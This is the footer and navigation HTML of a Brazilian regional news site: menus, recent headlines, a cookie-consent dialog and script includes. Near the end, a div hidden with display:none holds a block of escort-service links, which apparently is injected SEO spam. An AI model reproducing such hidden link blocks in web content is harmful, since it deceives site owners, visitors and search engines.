<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47064 menu-item-cat-75"><a href="https://www.soudesergipe.com.br/cidades/nossa-senhora-da-gloria-cidades/">Nossa Senhora da Glória</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47076 menu-item-cat-93"><a href="https://www.soudesergipe.com.br/cidades/monte-alegre-de-sergipe/">Monte Alegre de Sergipe</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47074 menu-item-cat-252"><a href="https://www.soudesergipe.com.br/cidades/itabaiana/">Itabaiana</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47075 menu-item-cat-133"><a href="https://www.soudesergipe.com.br/cidades/lagarto/">Lagarto</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-47067 menu-item-cat-17229"><a href="https://www.soudesergipe.com.br/eleicoes/">Eleições</a>
<ul class="sub-menu">
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47068 menu-item-cat-17037"><a href="https://www.soudesergipe.com.br/eleicoes/eleicoes-2022/">Eleições 2022</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47070 menu-item-cat-10392"><a href="https://www.soudesergipe.com.br/eleicoes/eleicoes-2020/">Eleições 2020</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47069 menu-item-cat-5"><a href="https://www.soudesergipe.com.br/eleicoes/eleicoes-2018/">Eleições 2018</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47072 menu-item-cat-6"><a href="https://www.soudesergipe.com.br/entretenimento/">Entretenimento</a></li>
</ul></div> </div>
</div>
</div>
</div>
<div id="atbs-ceris-offcanvas-mobile" class="atbs-ceris-offcanvas js-atbs-ceris-offcanvas js-perfect-scrollbar">
<div class="atbs-ceris-offcanvas__title">
<h2 class="site-logo atbs-ceris-logo not-exist-img-logo">
<a href="https://www.soudesergipe.com.br">

<img class="ceris-img-logo active" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/portalsoudesergipe-logo-head.png" alt="logo" />



</a>
</h2>
<ul class="social-list list-horizontal">
<li><a href="https://www.facebook.com/SoudeSergipe/" target="_blank"><i class="mdicon mdicon-facebook"></i></a></li><li><a href="https://instagram.com/portalsoudesergipe" target="_blank"><i class="mdicon mdicon-instagram"></i></a></li> </ul>
<a href="#atbs-ceris-offcanvas-mobile" class="atbs-ceris-offcanvas-close js-atbs-ceris-offcanvas-close" aria-label="Close"><span aria-hidden="true">&#10005;</span></a>
</div>
<div class="atbs-ceris-offcanvas__section atbs-ceris-offcanvas__section-navigation">
<div id="offcanvas-menu-mobile" class="menu-home-container"><ul id="menu-home-2" class="navigation navigation--offcanvas"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-47062"><a href="https://www.soudesergipe.com.br/ultimas-noticias/">Últimas Notícias</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20963 menu-item-cat-17"><a href="https://www.soudesergipe.com.br/brasil/">Brasil</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-47071 menu-item-cat-86"><a href="https://www.soudesergipe.com.br/estado/">Estado</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-48180 menu-item-cat-17309"><a href="https://www.soudesergipe.com.br/editais/">Editais Oficiais</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-18928 menu-item-cat-2"><a href="https://www.soudesergipe.com.br/cidades/">Cidades</a>
<ul class="sub-menu">
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47065 menu-item-cat-12"><a href="https://www.soudesergipe.com.br/cidades/aracaju/">Aracaju</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47073 menu-item-cat-59"><a href="https://www.soudesergipe.com.br/cidades/caninde/">Canindé</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47064 menu-item-cat-75"><a href="https://www.soudesergipe.com.br/cidades/nossa-senhora-da-gloria-cidades/">Nossa Senhora da Glória</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47076 menu-item-cat-93"><a href="https://www.soudesergipe.com.br/cidades/monte-alegre-de-sergipe/">Monte Alegre de Sergipe</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47074 menu-item-cat-252"><a href="https://www.soudesergipe.com.br/cidades/itabaiana/">Itabaiana</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47075 menu-item-cat-133"><a href="https://www.soudesergipe.com.br/cidades/lagarto/">Lagarto</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-47067 menu-item-cat-17229"><a href="https://www.soudesergipe.com.br/eleicoes/">Eleições</a>
<ul class="sub-menu">
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47068 menu-item-cat-17037"><a href="https://www.soudesergipe.com.br/eleicoes/eleicoes-2022/">Eleições 2022</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47070 menu-item-cat-10392"><a href="https://www.soudesergipe.com.br/eleicoes/eleicoes-2020/">Eleições 2020</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47069 menu-item-cat-5"><a href="https://www.soudesergipe.com.br/eleicoes/eleicoes-2018/">Eleições 2018</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47072 menu-item-cat-6"><a href="https://www.soudesergipe.com.br/entretenimento/">Entretenimento</a></li>
</ul></div> </div>
</div>
<div class="atbs-ceris-search-full">
<span id="atbs-ceris-search-remove"><i class="mdicon mdicon-close"></i></span>
<div class="atbs-ceris-search-full--wrap ajax-search is-in-navbar js-ajax-search is-active">
<div class="atbs-ceris-search-full--form">
<form action="https://www.soudesergipe.com.br/" method="get">
<input type="text" name="s" class="form-control search-form__input" autocomplete="off" placeholder="Type to search" value="">
<button type="submit" class="btn-search-full"><i class="mdicon mdicon-arrow_forward"></i></button>
</form>
<div class="result-default">
<div class="search-recommend-articles">
<h2 class="search-module-heading">
Últimas Postagens </h2>
<div class="popular-post-inner">
<div class="post-list">
<div class="list-item">
<article class="post" data-dark-mode="true">
<div class="post__text">
<h3 class="post__title typescale-1 custom-typescale-1">
<a href="https://www.soudesergipe.com.br/maus-tratos-a-animais-gera-revolta-em-moradores-de-nossa-senhora-da-gloria/">Maus-tratos a animais gera revolta em moradores de Nossa Senhora da Glória</a>
</h3>
</div>
</article>
</div>
<div class="list-item">
<article class="post" data-dark-mode="true">
<div class="post__text">
<h3 class="post__title typescale-1 custom-typescale-1">
<a href="https://www.soudesergipe.com.br/policiais-militares-agem-rapido-e-evitam-homicidio-em-itabaiana/">Policiais militares agem rápido e evitam homicídio em Itabaiana</a>
</h3>
 </div>
</article>
</div>
<div class="list-item">
<article class="post" data-dark-mode="true">
<div class="post__text">
<h3 class="post__title typescale-1 custom-typescale-1">
<a href="https://www.soudesergipe.com.br/opiniao-parte-da-imprensa-sergipana-insiste-em-dizer-que-valmir-nao-vai-disputar-o-governo/">Opinião: Parte da imprensa sergipana insiste em dizer que Valmir não vai disputar o Governo</a>
</h3>
</div>
</article>
</div>
<div class="list-item">
<article class="post" data-dark-mode="true">
<div class="post__text">
<h3 class="post__title typescale-1 custom-typescale-1">
<a href="https://www.soudesergipe.com.br/graccho-cardoso-suspeito-de-homicidios-morre-apos-invadir-escola-abandonada/">GRACCHO CARDOSO: Suspeito de homicídios morre após invadir escola abandonada</a>
</h3>
</div>
</article>
</div>
<div class="list-item">
<article class="post" data-dark-mode="true">
<div class="post__text">
<h3 class="post__title typescale-1 custom-typescale-1">
<a href="https://www.soudesergipe.com.br/policia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan/">Polícia Penal flagra mulher tentando entrar com drogas no Copemcan</a>
</h3>
</div>
</article>
</div>
</div>
</div>
</div>
<div class="search-tags">
<h2 class="search-module-heading">
Tags populares </h2>
<div class="tags-list entry-tags">
<ul>
<li>
<div class="background-img category-title-image">
</div>
<div class="category-tile__inner">
<div class="category-tile__text">
<div class="category-tile__name">estudantes</div>
</div>
</div>
<a href="https://www.soudesergipe.com.br/tag/estudantes/" class="link-overlay" title="View all"></a>
</li>
<li>
<div class="background-img category-title-image">
</div>
<div class="category-tile__inner">
<div class="category-tile__text">
<div class="category-tile__name">impostoderenda</div>
</div>
</div>
<a href="https://www.soudesergipe.com.br/tag/impostoderenda/" class="link-overlay" title="View all"></a>
</li>
<li>
<div class="background-img category-title-image">
</div>
<div class="category-tile__inner">
<div class="category-tile__text">
<div class="category-tile__name">irpf</div>
</div>
</div>
<a href="https://www.soudesergipe.com.br/tag/irpf/" class="link-overlay" title="View all"></a>
</li>
</ul>
</div>
</div>
</div>
</div>
<div class="atbs-ceris-search-full--result search-results">
<div class="typing-loader"></div>
<div class="search-results__inner">
</div>
</div>
</div>
</div>


<a href="#" class="atbs-ceris-go-top btn btn-default hidden-xs js-go-top-el"><i class="mdicon mdicon-arrow_upward"></i></a></div>
<div class="footer-ist-dub-21-04-2022" style="display: none"> <h3> <a href="http://istanbulescortiletisim.com" target="_blank">istanbul escort</a> <a href="http://istanbulescortpartner.com" target="_blank">istanbul escort</a> <a href="http://istanbulescorts.org" target="_blank">istanbul escort</a> <a href="http://istanbulescortagency.com" target="_blank">istanbul escort</a> <a href="http://istanbulescortbayan.com" target="_blank">istanbul escort</a> <a href="http://escortsdubai.biz" target="_blank">dubai escorts</a> <a href="http://vipdubaiescorts.org" target="_blank">dubai escorts</a> <a href="http://dubaiescortagency.net" target="_blank">dubai escorts</a> <a href="http://escortsindubai.org" target="_blank">dubai escorts</a> <a href="http://escortdubai.org" target="_blank">dubai escorts</a> <a href="http://dubaiescortservices.net" target="_blank">dubai escorts</a> <a href="http://vipescortdubai.com" target="_blank">dubai escorts</a> <a href="http://escortdubaivip.com" target="_blank">dubai escorts</a> </h3></div><!--googleoff: all--><div id="cookie-law-info-bar" data-nosnippet="true"><span><div class="cli-bar-container cli-style-v2"><div class="cli-bar-message">Usamos cookies em nosso site para oferecer a você a experiência mais relevante, lembrando suas preferências e visitas repetidas. Ao clicar em “Aceitar tudo”, você concorda com o uso de TODOS os cookies. No entanto, você pode visitar "Configurações de cookies" para fornecer um consentimento controlado.</div><div class="cli-bar-btn_container"><a role='button' class="medium cli-plugin-button cli-plugin-main-button cli_settings_button" style="margin:0px 5px 0px 0px">Configurações de cookies</a><a id="wt-cli-accept-all-btn" role='button' data-cli_action="accept_all" class="wt-cli-element medium cli-plugin-button wt-cli-accept-all-btn cookie_action_close_header cli_action_button">Aceitar tudo</a></div></div></span></div><div id="cookie-law-info-again" data-nosnippet="true"><span id="cookie_hdr_showagain">Gerenciar consentimento</span></div><div class="cli-modal" data-nosnippet="true" id="cliSettingsPopup" tabindex="-1" role="dialog" aria-labelledby="cliSettingsPopup" aria-hidden="true">
<div class="cli-modal-dialog" role="document">
<div class="cli-modal-content cli-bar-popup">
<button type="button" class="cli-modal-close" id="cliModalClose">
<svg class="" viewBox="0 0 24 24"><path d="M19 6.41l-1.41-1.41-5.59 5.59-5.59-5.59-1.41 1.41 5.59 5.59-5.59 5.59 1.41 1.41 5.59-5.59 5.59 5.59 1.41-1.41-5.59-5.59z"></path><path d="M0 0h24v24h-24z" fill="none"></path></svg>
<span class="wt-cli-sr-only">Fechar</span>
</button>
<div class="cli-modal-body">
<div class="cli-container-fluid cli-tab-container">
<div class="cli-row">
<div class="cli-col-12 cli-align-items-stretch cli-px-0">
<div class="cli-privacy-overview">
<h4>Privacy Overview</h4> <div class="cli-privacy-content">
<div class="cli-privacy-content-text">This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.</div>
</div>
<a class="cli-privacy-readmore" aria-label="Mostrar mais" role="button" data-readmore-text="Mostrar mais" data-readless-text="Mostrar menos"></a> </div>
</div>
<div class="cli-col-12 cli-align-items-stretch cli-px-0 cli-tab-section-container">
<div class="cli-tab-section">
<div class="cli-tab-header">
<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="necessary" data-toggle="cli-toggle-tab">
Necessary </a>
<div class="wt-cli-necessary-checkbox">
<input type="checkbox" class="cli-user-preference-checkbox" id="wt-cli-checkbox-necessary" data-id="checkbox-necessary" checked="checked" />
<label class="form-check-label" for="wt-cli-checkbox-necessary">Necessary</label>
</div>
<span class="cli-necessary-caption">Sempre ativado</span>
</div>
<div class="cli-tab-content">
<div class="cli-tab-pane cli-fade" data-id="necessary">
<div class="wt-cli-cookie-description">
Necessary cookies are absolutely essential for the website to function properly. These cookies ensure basic functionalities and security features of the website, anonymously.
<table class="cookielawinfo-row-cat-table cookielawinfo-winter"><thead><tr><th class="cookielawinfo-column-1">Cookie</th><th class="cookielawinfo-column-3">Duração</th><th class="cookielawinfo-column-4">Descrição</th></tr></thead><tbody><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">cookielawinfo-checkbox-analytics</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".</td></tr><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">cookielawinfo-checkbox-functional</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".</td></tr><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">cookielawinfo-checkbox-necessary</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".</td></tr><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">cookielawinfo-checkbox-others</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.</td></tr><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">cookielawinfo-checkbox-performance</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".</td></tr><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">viewed_cookie_policy</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.</td></tr></tbody></table> </div>
</div>
</div>
</div>
<div class="cli-tab-section">
<div class="cli-tab-header">
<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="functional" data-toggle="cli-toggle-tab">
Functional </a>
<div class="cli-switch">
<input type="checkbox" id="wt-cli-checkbox-functional" class="cli-user-preference-checkbox" data-id="checkbox-functional" />
<label for="wt-cli-checkbox-functional" class="cli-slider" data-cli-enable="Ativado" data-cli-disable="Desativado"><span class="wt-cli-sr-only">Functional</span></label>
</div>
</div>
<div class="cli-tab-content">
<div class="cli-tab-pane cli-fade" data-id="functional">
<div class="wt-cli-cookie-description">
Functional cookies help to perform certain functionalities like sharing the content of the website on social media platforms, collect feedbacks, and other third-party features.
</div>
</div>
</div>
</div>
<div class="cli-tab-section">
<div class="cli-tab-header">
<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="performance" data-toggle="cli-toggle-tab">
Performance </a>
<div class="cli-switch">
<input type="checkbox" id="wt-cli-checkbox-performance" class="cli-user-preference-checkbox" data-id="checkbox-performance" />
<label for="wt-cli-checkbox-performance" class="cli-slider" data-cli-enable="Ativado" data-cli-disable="Desativado"><span class="wt-cli-sr-only">Performance</span></label>
</div>
</div>
<div class="cli-tab-content">
<div class="cli-tab-pane cli-fade" data-id="performance">
<div class="wt-cli-cookie-description">
Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.
</div>
</div>
</div>
</div>
<div class="cli-tab-section">
<div class="cli-tab-header">
<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="analytics" data-toggle="cli-toggle-tab">
Analytics </a>
<div class="cli-switch">
<input type="checkbox" id="wt-cli-checkbox-analytics" class="cli-user-preference-checkbox" data-id="checkbox-analytics" />
<label for="wt-cli-checkbox-analytics" class="cli-slider" data-cli-enable="Ativado" data-cli-disable="Desativado"><span class="wt-cli-sr-only">Analytics</span></label>
</div>
</div>
<div class="cli-tab-content">
<div class="cli-tab-pane cli-fade" data-id="analytics">
<div class="wt-cli-cookie-description">
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.
</div>
</div>
</div>
</div>
<div class="cli-tab-section">
<div class="cli-tab-header">
<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="advertisement" data-toggle="cli-toggle-tab">
Advertisement </a>
<div class="cli-switch">
<input type="checkbox" id="wt-cli-checkbox-advertisement" class="cli-user-preference-checkbox" data-id="checkbox-advertisement" />
<label for="wt-cli-checkbox-advertisement" class="cli-slider" data-cli-enable="Ativado" data-cli-disable="Desativado"><span class="wt-cli-sr-only">Advertisement</span></label>
</div>
</div>
<div class="cli-tab-content">
<div class="cli-tab-pane cli-fade" data-id="advertisement">
<div class="wt-cli-cookie-description">
Advertisement cookies are used to provide visitors with relevant ads and marketing campaigns. These cookies track visitors across websites and collect information to provide customized ads.
</div>
</div>
</div>
</div>
<div class="cli-tab-section">
<div class="cli-tab-header">
<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="others" data-toggle="cli-toggle-tab">
Others </a>
<div class="cli-switch">
<input type="checkbox" id="wt-cli-checkbox-others" class="cli-user-preference-checkbox" data-id="checkbox-others" />
<label for="wt-cli-checkbox-others" class="cli-slider" data-cli-enable="Ativado" data-cli-disable="Desativado"><span class="wt-cli-sr-only">Others</span></label>
</div>
</div>
<div class="cli-tab-content">
<div class="cli-tab-pane cli-fade" data-id="others">
<div class="wt-cli-cookie-description">
Other uncategorized cookies are those that are being analyzed and have not been classified into a category as yet.
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="cli-modal-footer">
<div class="wt-cli-element cli-container-fluid cli-tab-container">
<div class="cli-row">
<div class="cli-col-12 cli-align-items-stretch cli-px-0">
<div class="cli-tab-footer wt-cli-privacy-overview-actions">
<a id="wt-cli-privacy-save-btn" role="button" tabindex="0" data-cli-action="accept" class="wt-cli-privacy-btn cli_setting_save_button wt-cli-privacy-accept-btn cli-btn">SALVAR E ACEITAR</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="cli-modal-backdrop cli-fade cli-settings-overlay"></div>
<div class="cli-modal-backdrop cli-fade cli-popupbar-overlay"></div>
<!--googleon: all--><link rel='stylesheet' id='cookie-law-info-table-css' href='https://www.soudesergipe.com.br/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-table.css?ver=2.1.1' type='text/css' media='all' />
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' id='contact-form-7-js-extra'>
/* <![CDATA[ */
var wpcf7 = {"api":{"root":"https:\/\/www.soudesergipe.com.br\/wp-json\/","namespace":"contact-form-7\/v1"}};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.5.6' id='contact-form-7-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.1' id='jquery-ui-tabs-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/jquery/ui/accordion.min.js?ver=1.13.1' id='jquery-ui-accordion-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/imagesloaded.min.js?ver=4.1.4' id='imagesloaded-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/masonry.min.js?ver=4.2.2' id='masonry-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b' id='jquery-masonry-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/throttle-debounce.min.js?ver=5.9.3' id='throttle-debounce-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/bootstrap.min.js?ver=5.9.3' id='bootstrap-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/countdown.min.js?ver=5.9.3' id='final-countdown-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/flickity.min.js?ver=5.9.3' id='flickity-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/fotorama.min.js?ver=5.9.3' id='fotorama-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/magnific-popup.min.js?ver=5.9.3' id='magnific-popup-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/owl-carousel.min.js?ver=5.9.3' id='owl-carousel-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/perfect-scrollbar.min.js?ver=5.9.3' id='perfect-scrollbar-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/theiaStickySidebar.min.js?ver=5.9.3' id='theiaStickySidebar-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/vticker.min.js?ver=5.9.3' id='vticker-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/vendors/fitvids.js?ver=5.9.3' id='fitvids-js'></script>
<script type='text/javascript' id='ceris-scripts-js-extra'>
/* <![CDATA[ */
var ajax_buff = {"ceris_security":{"ceris_security_code":{"content":"5066734f73"}}};
var ceris_wcount = ["130"];
var ATBS_DARKMODE_COOKIE_NAME = ["ceris_dark_mode-d9c5dc273b792da3697956f3d4b1a9020f8d7ef1"];
/* ]]> */
</script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/themes/ceris/js/scripts.js?ver=5.9.3' id='ceris-scripts-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/comment-reply.min.js?ver=5.9.3' id='comment-reply-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/plugins/facefaceface/js/auto-link.js?ver=200.7.0' id='Anderson_Makiyama_Hot_Links_Plus_js_auto_links-js'></script>
<script>!function(){window.advanced_ads_ready_queue=window.advanced_ads_ready_queue||[],advanced_ads_ready_queue.push=window.advanced_ads_ready;for(var d=0,a=advanced_ads_ready_queue.length;d<a;d++)advanced_ads_ready(advanced_ads_ready_queue[d])}();</script>
</body>
</html>